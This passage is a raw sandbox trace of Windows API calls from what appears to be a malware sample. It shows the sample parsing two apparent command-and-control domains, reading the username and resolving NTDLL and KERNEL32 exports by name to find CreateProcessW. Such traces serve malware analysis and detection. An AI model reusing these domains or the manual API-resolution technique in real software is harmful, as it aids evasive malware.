dwFlags=0x0, piRet=0xb0938cf9c8 | out: piRet=0xb0938cf9c8) returned 1 [0207.839] StrToIntExA (in: pszString="60", dwFlags=0x0, piRet=0xb0938cf9c8 | out: piRet=0xb0938cf9c8) returned 1 [0207.839] lstrlenA (lpString="CBA16FFC891E31A5") returned 16 [0207.839] lstrlenA (lpString="niperola.com bagersim.com") returned 25 [0207.840] GetProcAddress (hModule=0x7ff977360000, lpProcName="StrChrA") returned 0x7ff977374cc0 [0207.840] StrChrA (lpStart="niperola.com bagersim.com", wMatch=0x20) returned=" bagersim.com" [0207.840] StrChrA (lpStart="bagersim.com", wMatch=0x20) returned 0x0 [0207.840] GetProcAddress (hModule=0x7ff977360000, lpProcName="StrTrimA") returned 0x7ff977374e80 [0207.840] StrTrimA (in: psz="niperola.com bagersim.com", pszTrimChars=" \x09" | out: psz="niperola.com bagersim.com") returned 0 [0207.840] StrChrA (lpStart="niperola.com bagersim.com", wMatch=0x20) returned=" bagersim.com" [0207.840] StrTrimA (in: psz="bagersim.com", pszTrimChars=" \x09" | out: psz="bagersim.com") returned 0 [0207.840] StrChrA (lpStart="bagersim.com", wMatch=0x20) returned 0x0 [0207.840] GetModuleHandleA (lpModuleName="KERNEL32.DLL") returned 0x7ff977ab0000 [0207.840] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x7ff977f30000 [0207.840] GetModuleHandleA (lpModuleName="kernelbase") returned 0x7ff9753d0000 [0207.840] GetProcAddress (hModule=0x7ff976f80000, lpProcName="GetUserNameA") returned 0x7ff976faec40 [0207.841] GetUserNameA (in: lpBuffer=0x0, pcbBuffer=0xb0938cfa88 | out: lpBuffer=0x0, pcbBuffer=0xb0938cfa88) returned 0 [0207.956] GetUserNameA (in: lpBuffer=0xb095a02a70, pcbBuffer=0xb0938cfa88 | out: lpBuffer="CIiHmnxMn6Ps", pcbBuffer=0xb0938cfa88) returned 1 [0207.956] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x7ff977f30000 [0207.956] lstrlenA (lpString="A_SHAFinal") returned 10 [0207.956] lstrlenA (lpString="A_SHAInit") returned 9 [0207.956] lstrlenA (lpString="A_SHAUpdate") returned 11 [0207.956] lstrlenA (lpString="AlpcAdjustCompletionListConcurrencyCount") returned 40 [0207.956] lstrlenA (lpString="AlpcFreeCompletionListMessage") returned 29 [0207.956] lstrlenA (lpString="AlpcGetCompletionListLastMessageInformation") returned 43 [0207.957] lstrlenA (lpString="AlpcGetCompletionListMessageAttributes") returned 38 [0207.957] lstrlenA (lpString="AlpcGetHeaderSize") returned 17 [0207.957] lstrlenA (lpString="AlpcGetMessageAttribute") returned 23 [0207.957] lstrlenA (lpString="AlpcGetMessageFromCompletionList") returned 32 [0207.957] lstrlenA (lpString="AlpcGetOutstandingCompletionListMessageCount") returned 44 [0207.957] lstrlenA (lpString="AlpcInitializeMessageAttribute") returned 30 [0207.957] lstrlenA (lpString="AlpcMaxAllowedMessageLength") returned 27 [0207.957] lstrlenA (lpString="AlpcRegisterCompletionList") returned 26 [0207.957] lstrlenA (lpString="AlpcRegisterCompletionListWorkerThread") returned 38 [0207.957] lstrlenA (lpString="AlpcRundownCompletionList") returned 25 [0207.957] lstrlenA (lpString="AlpcUnregisterCompletionList") returned 28 [0207.957] lstrlenA (lpString="AlpcUnregisterCompletionListWorkerThread") returned 40 [0207.957] lstrlenA (lpString="ApiSetQueryApiSetPresence") returned 25 [0207.957] lstrlenA (lpString="CsrAllocateCaptureBuffer") returned 24 [0207.957] lstrlenA (lpString="CsrAllocateMessagePointer") returned 25 [0207.957] lstrlenA (lpString="CsrCaptureMessageBuffer") returned 23 [0207.957] lstrlenA (lpString="CsrCaptureMessageMultiUnicodeStringsInPlace") returned 43 [0207.957] lstrlenA (lpString="CsrCaptureMessageString") returned 23 [0207.957] lstrlenA (lpString="CsrCaptureTimeout") returned 17 [0207.957] lstrlenA (lpString="CsrClientCallServer") returned 19 [0207.957] lstrlenA (lpString="CsrClientConnectToServer") returned 24 [0207.957] lstrlenA (lpString="CsrFreeCaptureBuffer") returned 20 [0207.957] lstrlenA (lpString="CsrGetProcessId") returned 15 [0207.957] lstrlenA (lpString="CsrIdentifyAlertableThread") returned 26 [0207.957] lstrlenA (lpString="CsrSetPriorityClass") returned 19 [0207.957] lstrlenA (lpString="CsrVerifyRegion") returned 15 [0207.957] lstrlenA (lpString="DbgBreakPoint") returned 13 [0207.957] lstrlenA (lpString="DbgPrint") returned 8 [0207.957] lstrlenA (lpString="DbgPrintEx") returned 10 [0207.957] lstrlenA (lpString="DbgPrintReturnControlC") returned 22 [0207.957] lstrlenA (lpString="DbgPrompt") returned 9 [0207.957] lstrlenA (lpString="DbgQueryDebugFilterState") returned 24 [0207.957] lstrlenA (lpString="DbgSetDebugFilterState") returned 22 [0207.958] lstrlenA (lpString="DbgUiConnectToDbg") returned 17 [0207.958] lstrlenA (lpString="DbgUiContinue") returned 13 [0207.958] lstrlenA (lpString="DbgUiConvertStateChangeStructure") returned 32 [0207.958] lstrlenA (lpString="DbgUiConvertStateChangeStructureEx") returned 34 [0207.958] lstrlenA (lpString="DbgUiDebugActiveProcess") returned 23 [0207.958] lstrlenA (lpString="DbgUiGetThreadDebugObject") returned 25 [0207.958] lstrlenA (lpString="DbgUiIssueRemoteBreakin") returned 23 [0207.958] lstrlenA (lpString="DbgUiRemoteBreakin") returned 18 [0207.958] lstrlenA (lpString="DbgUiSetThreadDebugObject") returned 25 [0207.958] lstrlenA (lpString="DbgUiStopDebugging") returned 18 [0207.958] lstrlenA (lpString="DbgUiWaitStateChange") returned 20 [0207.958] lstrlenA (lpString="DbgUserBreakPoint") returned 17 [0207.958] lstrlenA (lpString="EtwCreateTraceInstanceId") returned 24 [0207.958] lstrlenA (lpString="EtwDeliverDataBlock") returned 19 [0207.958] lstrlenA (lpString="EtwEnumerateProcessRegGuids") returned 27 [0207.958] lstrlenA (lpString="EtwEventActivityIdControl") returned 25 [0207.958] lstrlenA (lpString="EtwEventEnabled") returned 15 [0207.958] lstrlenA (lpString="EtwEventProviderEnabled") returned 23 [0207.958] lstrlenA (lpString="EtwEventRegister") returned 16 [0207.958] lstrlenA (lpString="EtwEventSetInformation") returned 22 [0207.958] lstrlenA (lpString="EtwEventUnregister") returned 18 [0207.958] lstrlenA (lpString="EtwEventWrite") returned 13 [0207.958] lstrlenA (lpString="EtwEventWriteEndScenario") returned 24 [0207.958] lstrlenA (lpString="EtwEventWriteEx") returned 15 [0207.958] lstrlenA (lpString="EtwEventWriteFull") returned 17 [0207.958] lstrlenA (lpString="EtwEventWriteNoRegistration") returned 27 [0207.958] lstrlenA (lpString="EtwEventWriteStartScenario") returned 26 [0207.958] lstrlenA (lpString="EtwEventWriteString") returned 19 [0207.958] lstrlenA (lpString="EtwEventWriteTransfer") returned 21 [0207.958] lstrlenA (lpString="EtwGetTraceEnableFlags") returned 22 [0207.958] lstrlenA (lpString="EtwGetTraceEnableLevel") returned 22 [0207.958] lstrlenA (lpString="EtwGetTraceLoggerHandle") returned 23 [0207.958] lstrlenA (lpString="EtwLogTraceEvent") returned 16 [0207.958] lstrlenA (lpString="EtwNotificationRegister") returned 23 [0207.959] lstrlenA (lpString="EtwNotificationUnregister") returned 25 [0207.959] lstrlenA (lpString="EtwProcessPrivateLoggerRequest") returned 30 [0207.959] lstrlenA (lpString="EtwRegisterSecurityProvider") returned 27 [0207.959] lstrlenA (lpString="EtwRegisterTraceGuidsA") returned 22 [0207.959] lstrlenA (lpString="EtwRegisterTraceGuidsW") returned 22 [0207.959] lstrlenA (lpString="EtwReplyNotification") returned 20 [0207.959] lstrlenA (lpString="EtwSendNotification") returned 19 [0207.959] lstrlenA (lpString="EtwSetMark") returned 10 [0207.959] lstrlenA (lpString="EtwTraceEventInstance") returned 21 [0207.959] lstrlenA (lpString="EtwTraceMessage") returned 15 [0207.959] lstrlenA (lpString="EtwTraceMessageVa") returned 17 [0207.959] lstrlenA (lpString="EtwUnregisterTraceGuids") returned 23 [0207.959] lstrlenA (lpString="EtwWriteUMSecurityEvent") returned 23 [0207.959] lstrlenA (lpString="EtwpCreateEtwThread") returned 19 [0207.959] lstrlenA (lpString="EtwpGetCpuSpeed") returned 15 [0207.959] lstrlenA (lpString="EvtIntReportAuthzEventAndSourceAsync") returned 36 [0207.959] lstrlenA (lpString="EvtIntReportEventAndSourceAsync") returned 31 [0207.959] lstrlenA (lpString="ExpInterlockedPopEntrySListEnd") returned 30 [0207.959] lstrlenA (lpString="ExpInterlockedPopEntrySListFault") returned 32 [0207.959] lstrlenA (lpString="ExpInterlockedPopEntrySListResume") returned 33 [0207.959] lstrlenA (lpString="KiRaiseUserExceptionDispatcher") returned 30 [0207.959] lstrlenA (lpString="KiUserApcDispatcher") returned 19 [0207.959] lstrlenA (lpString="KiUserCallbackDispatcher") returned 24 [0207.959] lstrlenA (lpString="KiUserExceptionDispatcher") returned 25 [0207.959] lstrlenA (lpString="KiUserInvertedFunctionTable") returned 27 [0207.959] lstrlenA (lpString="LdrAccessResource") returned 17 [0207.959] lstrlenA (lpString="LdrAddDllDirectory") returned 18 [0207.959] lstrlenA (lpString="LdrAddLoadAsDataTable") returned 21 [0207.959] lstrlenA (lpString="LdrAddRefDll") returned 12 [0207.959] lstrlenA (lpString="LdrAppxHandleIntegrityFailure") returned 29 [0207.959] lstrlenA (lpString="LdrDisableThreadCalloutsForDll") returned 30 [0207.959] lstrlenA (lpString="LdrEnumResources") returned 16 [0207.959] lstrlenA (lpString="LdrEnumerateLoadedModules") returned 25 [0207.959] lstrlenA (lpString="LdrFastFailInLoaderCallout") returned 26 [0207.959] lstrlenA (lpString="LdrFindEntryForAddress") returned 22 [0207.959] lstrlenA (lpString="LdrFindResourceDirectory_U") returned 26 [0207.959] lstrlenA (lpString="LdrFindResourceEx_U") returned 19 [0207.959] lstrlenA (lpString="LdrFindResource_U") returned 17 [0207.959] lstrlenA (lpString="LdrFlushAlternateResourceModules") returned 32 [0207.960] lstrlenA (lpString="LdrGetDllDirectory") returned 18 [0207.960] lstrlenA (lpString="LdrGetDllFullName") returned 17 [0207.960] lstrlenA (lpString="LdrGetDllHandle") returned 15 [0207.960] lstrlenA (lpString="LdrGetDllHandleByMapping") returned 24 [0207.960] lstrlenA (lpString="LdrGetDllHandleByName") returned 21 [0207.960] lstrlenA (lpString="LdrGetDllHandleEx") returned 17 [0207.960] lstrlenA (lpString="LdrGetDllPath") returned 13 [0207.960] lstrlenA (lpString="LdrGetFailureData") returned 17 [0207.960] lstrlenA (lpString="LdrGetFileNameFromLoadAsDataTable") returned 33 [0207.960] lstrlenA (lpString="LdrGetKnownDllSectionHandle") returned 27 [0207.960] lstrlenA (lpString="LdrGetProcedureAddress") returned 22 [0207.960] lstrlenA (lpString="LdrGetProcedureAddressEx") returned 24 [0207.960] lstrlenA (lpString="LdrGetProcedureAddressForCaller") returned 31 [0207.960] lstrlenA (lpString="LdrInitShimEngineDynamic") returned 24 [0207.960] lstrlenA (lpString="LdrInitializeThunk") returned 18 [0207.960] lstrlenA (lpString="LdrLoadAlternateResourceModule") returned 30 [0207.960] lstrlenA (lpString="LdrLoadAlternateResourceModuleEx") returned 32 [0207.960] lstrlenA (lpString="LdrLoadDll") returned 10 [0207.960] lstrlenA (lpString="LdrLockLoaderLock") returned 17 [0207.960] lstrlenA (lpString="LdrOpenImageFileOptionsKey") returned 26 [0207.960] lstrlenA (lpString="LdrProcessInitializationComplete") returned 32 [0207.960] lstrlenA (lpString="LdrProcessRelocationBlock") returned 25 [0207.960] lstrlenA (lpString="LdrProcessRelocationBlockEx") returned 27 [0207.960] lstrlenA (lpString="LdrQueryImageFileExecutionOptions") returned 33 [0207.960] lstrlenA (lpString="LdrQueryImageFileExecutionOptionsEx") returned 35 [0207.960] lstrlenA (lpString="LdrQueryImageFileKeyOption") returned 26 [0207.960] lstrlenA (lpString="LdrQueryModuleServiceTags") returned 25 [0207.960] lstrlenA (lpString="LdrQueryOptionalDelayLoadedAPI") returned 30 [0207.960] lstrlenA (lpString="LdrQueryProcessModuleInformation") returned 32 [0207.960] lstrlenA (lpString="LdrRegisterDllNotification") returned 26 [0207.960] lstrlenA (lpString="LdrRemoveDllDirectory") returned 21 [0207.960] lstrlenA (lpString="LdrRemoveLoadAsDataTable") returned 24 [0207.960] lstrlenA (lpString="LdrResFindResource") returned 18 [0207.960] lstrlenA (lpString="LdrResFindResourceDirectory") returned 27 [0207.960] lstrlenA (lpString="LdrResGetRCConfig") returned 17 [0207.960] lstrlenA (lpString="LdrResRelease") returned 13 [0207.960] lstrlenA (lpString="LdrResSearchResource") returned 20 [0207.960] lstrlenA (lpString="LdrResolveDelayLoadedAPI") returned 24 [0207.960] lstrlenA (lpString="LdrResolveDelayLoadsFromDll") returned 27 [0207.960] lstrlenA (lpString="LdrRscIsTypeExist") returned 17 [0207.960] lstrlenA (lpString="LdrSetAppCompatDllRedirectionCallback") returned 37 [0207.960] lstrlenA (lpString="LdrSetDefaultDllDirectories") returned 27 [0207.960] lstrlenA (lpString="LdrSetDllDirectory") returned 18 [0207.960] lstrlenA (lpString="LdrSetDllManifestProber") returned 23 [0207.960] lstrlenA (lpString="LdrSetImplicitPathOptions") returned 25 [0207.960] lstrlenA (lpString="LdrSetMUICacheType") returned 18 [0207.960] lstrlenA (lpString="LdrShutdownProcess") returned 18 [0207.961] lstrlenA (lpString="LdrShutdownThread") returned 17 [0207.961] lstrlenA (lpString="LdrStandardizeSystemPath") returned 24 [0207.961] lstrlenA (lpString="LdrSystemDllInitBlock") returned 21 [0207.961] lstrlenA (lpString="LdrUnloadAlternateResourceModule") returned 32 [0207.961] lstrlenA (lpString="LdrUnloadAlternateResourceModuleEx") returned 34 [0207.961] lstrlenA (lpString="LdrUnloadDll") returned 12 [0207.961] lstrlenA (lpString="LdrUnlockLoaderLock") returned 19 [0207.961] lstrlenA (lpString="LdrUnregisterDllNotification") returned 28 [0207.961] lstrlenA (lpString="LdrVerifyImageMatchesChecksum") returned 29 [0207.961] lstrlenA (lpString="LdrVerifyImageMatchesChecksumEx") returned 31 [0207.961] lstrlenA (lpString="LdrpResGetMappingSize") returned 21 [0207.961] lstrlenA (lpString="LdrpResGetResourceDirectory") returned 27 [0207.961] lstrlenA (lpString="MD4Final") returned 8 [0207.961] lstrlenA (lpString="MD4Init") returned 7 [0207.961] lstrlenA (lpString="MD4Update") returned 9 [0207.961] lstrlenA (lpString="MD5Final") returned 8 [0207.961] lstrlenA (lpString="MD5Init") returned 7 [0207.961] lstrlenA (lpString="MD5Update") returned 9 [0207.961] lstrlenA (lpString="NlsAnsiCodePage") returned 15 [0207.961] lstrlenA (lpString="NlsMbCodePageTag") returned 16 [0207.961] lstrlenA (lpString="NlsMbOemCodePageTag") returned 19 [0207.961] lstrlenA (lpString="NtAcceptConnectPort") returned 19 [0207.961] lstrlenA (lpString="NtAccessCheck") returned 13 [0207.961] lstrlenA (lpString="NtAccessCheckAndAuditAlarm") returned 26 [0207.961] lstrlenA (lpString="NtAccessCheckByType") returned 19 [0207.961] lstrlenA (lpString="NtAccessCheckByTypeAndAuditAlarm") returned 32 [0207.961] lstrlenA (lpString="NtAccessCheckByTypeResultList") returned 29 [0207.961] lstrlenA (lpString="NtAccessCheckByTypeResultListAndAuditAlarm") returned 42 [0207.961] lstrlenA (lpString="NtAccessCheckByTypeResultListAndAuditAlarmByHandle") returned 50 [0207.961] lstrlenA (lpString="NtAddAtom") returned 9 [0207.961] lstrlenA (lpString="NtAddAtomEx") returned 11 [0207.961] lstrlenA (lpString="NtAddBootEntry") returned 14 [0207.961] lstrlenA (lpString="NtAddDriverEntry") returned 16 [0207.961] lstrlenA (lpString="NtAdjustGroupsToken") returned 19 [0207.961] lstrlenA (lpString="NtAdjustPrivilegesToken") returned 23 [0207.961] lstrlenA (lpString="NtAdjustTokenClaimsAndDeviceGroups") returned 34 [0207.961] lstrlenA (lpString="NtAlertResumeThread") returned 19 [0207.961] lstrlenA (lpString="NtAlertThread") returned 13 [0207.961] lstrlenA (lpString="NtAlertThreadByThreadId") returned 23 [0207.961] lstrlenA (lpString="NtAllocateLocallyUniqueId") returned 25 [0207.961] lstrlenA (lpString="NtAllocateReserveObject") returned 23 [0207.961] lstrlenA (lpString="NtAllocateUserPhysicalPages") returned 27 [0207.961] lstrlenA (lpString="NtAllocateUuids") returned 15 [0207.961] lstrlenA (lpString="NtAllocateVirtualMemory") returned 23 [0207.961] lstrlenA (lpString="NtAlpcAcceptConnectPort") returned 23 [0207.961] lstrlenA (lpString="NtAlpcCancelMessage") returned 19 [0207.961] lstrlenA (lpString="NtAlpcConnectPort") returned 17 [0207.962] lstrlenA (lpString="NtAlpcConnectPortEx") returned 19 [0207.962] lstrlenA (lpString="NtAlpcCreatePort") returned 16 [0207.962] lstrlenA (lpString="NtAlpcCreatePortSection") returned 23 [0207.962] lstrlenA (lpString="NtAlpcCreateResourceReserve") returned 27 [0207.962] lstrlenA (lpString="NtAlpcCreateSectionView") returned 23 [0207.962] lstrlenA (lpString="NtAlpcCreateSecurityContext") returned 27 [0207.962] lstrlenA (lpString="NtAlpcDeletePortSection") returned 23 [0207.962] lstrlenA (lpString="NtAlpcDeleteResourceReserve") returned 27 [0207.962] lstrlenA (lpString="NtAlpcDeleteSectionView") returned 23 [0207.962] lstrlenA (lpString="NtAlpcDeleteSecurityContext") returned 27 [0207.962] lstrlenA (lpString="NtAlpcDisconnectPort") returned 20 [0207.962] lstrlenA (lpString="NtAlpcImpersonateClientContainerOfPort") returned 38 [0207.962] lstrlenA (lpString="NtAlpcImpersonateClientOfPort") returned 29 [0207.962] lstrlenA (lpString="NtAlpcOpenSenderProcess") returned 23 [0207.962] lstrlenA (lpString="NtAlpcOpenSenderThread") returned 22 [0207.962] lstrlenA (lpString="NtAlpcQueryInformation") returned 22 [0207.962] lstrlenA (lpString="NtAlpcQueryInformationMessage") returned 29 [0207.962] lstrlenA (lpString="NtAlpcRevokeSecurityContext") returned 27 [0207.962] lstrlenA (lpString="NtAlpcSendWaitReceivePort") returned 25 [0207.962] lstrlenA (lpString="NtAlpcSetInformation") returned 20 [0207.962] lstrlenA (lpString="NtApphelpCacheControl") returned 21 [0207.962] lstrlenA (lpString="NtAreMappedFilesTheSame") returned 23 [0207.962] lstrlenA (lpString="NtAssignProcessToJobObject") returned 26 [0207.962] lstrlenA (lpString="NtAssociateWaitCompletionPacket") returned 31 [0207.962] lstrlenA (lpString="NtCallbackReturn") returned 16 [0207.962] lstrlenA (lpString="NtCancelIoFile") returned 14 [0207.962] lstrlenA (lpString="NtCancelIoFileEx") returned 16 [0207.962] lstrlenA (lpString="NtCancelSynchronousIoFile") returned 25 [0207.962] lstrlenA (lpString="NtCancelTimer") returned 13 [0207.962] lstrlenA (lpString="NtCancelTimer2") returned 14 [0207.962] lstrlenA (lpString="NtCancelWaitCompletionPacket") returned 28 [0207.962] lstrlenA (lpString="NtClearEvent") returned 12 [0207.962] lstrlenA (lpString="NtClose") returned 7 [0207.962] lstrlenA (lpString="NtCloseObjectAuditAlarm") returned 23 [0207.962] lstrlenA (lpString="NtCommitComplete") returned 16 [0207.962] lstrlenA (lpString="NtCommitEnlistment") returned 18 [0207.962] lstrlenA (lpString="NtCommitTransaction") returned 19 [0207.962] lstrlenA (lpString="NtCompactKeys") returned 13 [0207.962] lstrlenA (lpString="NtCompareObjects") returned 16 [0207.962] lstrlenA (lpString="NtCompareTokens") returned 15 [0207.962] lstrlenA (lpString="NtCompleteConnectPort") returned 21 [0207.962] lstrlenA (lpString="NtCompressKey") returned 13 [0207.962] lstrlenA (lpString="NtConnectPort") returned 13 [0207.967] GetModuleHandleA (lpModuleName="ADVAPI32.DLL") returned 0x7ff976f80000 [0207.968] GetModuleHandleA (lpModuleName="KERNEL32.DLL") returned 0x7ff977ab0000 [0207.968] lstrcmpA (lpString1="AcquireSRWLockExclusive", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="AcquireSRWLockShared", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="ActivateActCtx", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="AddAtomA", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="AddAtomW", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="AddDllDirectory", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="AddRefActCtx", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="AddVectoredContinueHandler", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="AddVectoredExceptionHandler", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="AllocConsole", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="AppXGetOSMaxVersionTested", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="ApplicationRecoveryFinished", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="ApplicationRecoveryInProgress", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="AreFileApisANSI", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="AssignProcessToJobObject", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="AttachConsole", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="BackupRead", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="BackupSeek", lpString2="CreateProcessW") returned -1 [0207.970] lstrcmpA (lpString1="BackupWrite", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseCheckAppcompatCache", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseCheckAppcompatCacheEx", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseCheckAppcompatCacheExWorker", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseCheckAppcompatCacheWorker", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseCheckElevation", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseCleanupAppcompatCacheSupport", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseCleanupAppcompatCacheSupportWorker", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseDestroyVDMEnvironment", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseDllReadWriteIniFile", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseDumpAppcompatCache", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseDumpAppcompatCacheWorker", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseElevationPostProcessing", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseFlushAppcompatCache", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseFlushAppcompatCacheWorker", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseFormatObjectAttributes", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseFormatTimeOut", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseFreeAppCompatDataForProcessWorker", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseGenerateAppCompatData", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseGetNamedObjectDirectory", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseInitAppcompatCacheSupport", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseInitAppcompatCacheSupportWorker", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseIsAppcompatInfrastructureDisabled", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseIsAppcompatInfrastructureDisabledWorker", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseIsDosApplication", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseQueryModuleData", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseReadAppCompatDataForProcessWorker", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseSetLastNTError", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseThreadInitThunk", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseUpdateAppcompatCache", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseUpdateAppcompatCacheWorker", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseUpdateVDMEntry", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseVerifyUnicodeString", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BaseWriteErrorElevationRequiredEvent", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="Basep8BitStringToDynamicUnicodeString", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BasepAllocateActivationContextActivationBlock", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BasepAnsiStringToDynamicUnicodeString", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BasepAppContainerEnvironmentExtension", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BasepAppXExtension", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BasepCheckAppCompat", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BasepCheckWebBladeHashes", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BasepCheckWinSaferRestrictions", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BasepConstructSxsCreateProcessMessage", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BasepCopyEncryption", lpString2="CreateProcessW") returned -1 [0207.971] lstrcmpA (lpString1="BasepFreeActivationContextActivationBlock", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="BasepFreeAppCompatData", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="BasepGetAppCompatData", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="BasepGetComputerNameFromNtPath", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="BasepGetExeArchType", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="BasepIsProcessAllowed", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="BasepMapModuleHandle", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="BasepNotifyLoadStringResource", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="BasepPostSuccessAppXExtension", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="BasepProcessInvalidImage", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="BasepQueryAppCompat", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="BasepReleaseAppXContext", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="BasepReleaseSxsCreateProcessUtilityStruct", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="BasepReportFault", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="BasepSetFileEncryptionCompression", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="Beep", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="BeginUpdateResourceA", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="BeginUpdateResourceW", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="BindIoCompletionCallback", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="BuildCommDCBA", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA (lpString1="BuildCommDCBAndTimeoutsA", lpString2="CreateProcessW") returned -1 [0207.972] lstrcmpA 